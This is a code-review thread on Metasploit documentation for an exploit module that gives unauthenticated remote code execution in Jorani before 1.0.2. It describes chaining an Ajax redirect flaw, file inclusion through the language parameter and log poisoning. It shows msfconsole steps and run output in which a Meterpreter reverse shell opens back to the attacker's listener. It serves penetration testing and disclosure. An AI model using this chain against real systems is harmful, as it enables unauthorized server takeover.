Add exploit for unauth RCE Jorani (#18123)
rapid7/metasploit-framework: documentation/modules/exploit/multi/php/jorani_path_trav.md

## Vulnerable Application

> Jorani prior to 1.0.2 allows unauthenticated remote malicious users to execute arbitrary code.

Reviewer: As which user?

> This is due to a lack of sanitization on language parameter, that can lead to file inclusion of ".php" files.

Reviewer: ```suggestion
This is due to a lack of sanitization on the language parameter, which can lead to the inclusion of arbitrary ".php" files.
```

Moreover, the log file for jorani ends with ".php" in Jorani < 1.0.2.

> Log poisonning is possible, so an authenticated attacker can execute arbitrary code.

Reviewer: ```suggestion
Log poisoning is possible, so an authenticated attacker can execute arbitrary code.
```

Can execute arbitrary code how though? Please elaborate on this, your assuming the reader knows a lot of prior information about how log poisoning works and how it can be used to get remote code execution.

> Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.

Reviewer: How is this relevant to the exploit? The impact here isn't really explained as to what this allows an attacker to do. For all I know this is just a bug with no real impact. Please explain why this is useful for an attacker and what impact it has on the exploitation process in terms of what it can be used for and how this contributes to a full exploit.

So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application.

This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.

## Verification Steps
1. Start `msfconsole`
2. `use exploit/multi/php/jorani_path_trav`
3. set `RHOSTS` and `RPORT`
4. Confirm the target is vulnerable: `check`. The result expected is `The target appears to be vulnerable.`
5. Default payload for the exploit will be `php/meterpreter/reverse_tcp`
6. set `LHOST`
7. `exploit`

> 8. Confirm you have now a cmd session

Reviewer: As which user?

## Options

### TARGETURI (optional)
The path to the jorani website. By default it is empty.

## Scenarios

```

> msf6 exploit(multi/php/jorani_path_trav) > run

Reviewer: Please also show which options you set or do a `show options` command output show that we can see which options you set prior to running the exploit. This helps us debug issues down the line and has solved confusions in the past so its useful to include.

## Vulnerable Application

Jorani prior to 1.0.2 allows unauthenticated users to execute arbitrary code.

This is due to a lack of sanitization on the language parameter, which can lead to the file inclusion of arbitrary ".php" files.

Moreover, the log file for jorani ends with ".php" in Jorani < 1.0.2.

Log poisoning is possible, an attacker can abuse this to store malicious data in the log file.

Data like '<?php ...;?>' can been added to the log file, then if this file is included by php, it will be executed.

Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.

So the scripts will not stop after the redirection because an exit statement is missing.

Because of this, the attacker can make the script continue and reach the LFI vulnerability without being authenticated.

So by chaining theses 3 vulnerabilities an unauthenticated user can execute arbitrary code on the application.

> This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.

Reviewer 2: ```suggestion
This module has been tested successfully on Jorani 1.0.0, Ubuntu 20.04 (x86_64) with kernel version 5.15.0-75.

### Installation Steps
For a step by step installation tutorial on Ubuntu please refer to [How to install Jorani](https://jorani.org/how-to-install-jorani.html)
```

## Verification Steps
1. Start `msfconsole`
2. `use exploit/multi/php/jorani_path_trav`
3. set `RHOSTS` and `RPORT`
4. Confirm the target is vulnerable: `check`. The result expected is `The target appears to be vulnerable.`
5. Default payload for the exploit will be `php/meterpreter/reverse_tcp`
6. set `LHOST`
7. `exploit`
8. Confirm you have now a cmd session as www-data

## Options

### TARGETURI (optional)
The path to the jorani website. By default it is empty.

## Scenarios

```

> msf6 exploit(multi/php/jorani_path_trav) > show options
> 
> Module options (exploit/multi/php/jorani_path_trav):
> 
>    Name       Current Setting  Required  Description
>    ----       ---------------  --------  -----------
>    Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
>    RHOSTS     172.31.3.3       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
>    RPORT      80               yes       The target port (TCP)
>    SSL        true             no        Negotiate SSL/TLS for outgoing connections
>    TARGETURI  /                yes       The base path of Jorani
>    VHOST                       no        HTTP server virtual host
> 
> 
> Payload options (php/meterpreter/reverse_tcp):
> 
>    Name   Current Setting  Required  Description
>    ----   ---------------  --------  -----------
>    LHOST  172.31.3.1       yes       The listen address (an interface may be specified)
>    LPORT  9898             yes       The listen port
> 
> 
> Exploit target:
> 
>    Id  Name
>    --  ----
>    0   Jorani < 1.0.2
> 
> 
> 
> View the full module info with the info, or info -d command.
> ```
> 
> ```
> msf6 exploit(multi/php/jorani_path_trav) > run
> 
> [-] Handler failed to bind to 172.31.3.1:9898:-  -
> [*] Started reverse TCP handler on 0.0.0.0:9898
> [*] Trying to exploit LFI
> [*] Recovering CSRF token
> [+] CSRF found: 3ff4c712b884e3f577d9c3f65adac16f
> [*] Poisonning log with payload..
> [*] Sending 1st payload
> [*] Including poisonned log file log-2023-06-27.php
> [+] Triggering payload
> [*] Sending stage (39927 bytes) to 10.0.2.2
> [*] Meterpreter session 1 opened (10.0.2.15:9898 -> 10.0.2.2:46898) at 2023-06-27 19:21:28 +0200
> 
> meterpreter > getuid 
> Server username: www-data

Reviewer 2: Update the documentation as the module output has changed.
```suggestion
msf6 exploit(multi/php/jorani_path_trav) > options

Module options (exploit/multi/php/jorani_path_trav):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.16.199.158   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  jorani           yes       The base path of Jorani
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Jorani < 1.0.2

View the full module info with the info, or info -d command.

msf6 exploit(multi/php/jorani_path_trav) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Jorani version
[+] Jorani seems to be running on the target!
[+] Found version: 1.0.0
[+] The target appears to be vulnerable.
[*] Trying to exploit LFI
[*] Recovering CSRF token
[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
[*] Poisoning log with payload..
[*] Sending 1st payload
[*] Including poisoned log file log-2023-08-18.php.
[+] Triggering payload
[*] Sending stage (39927 bytes) to 172.16.199.158
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > exit
```
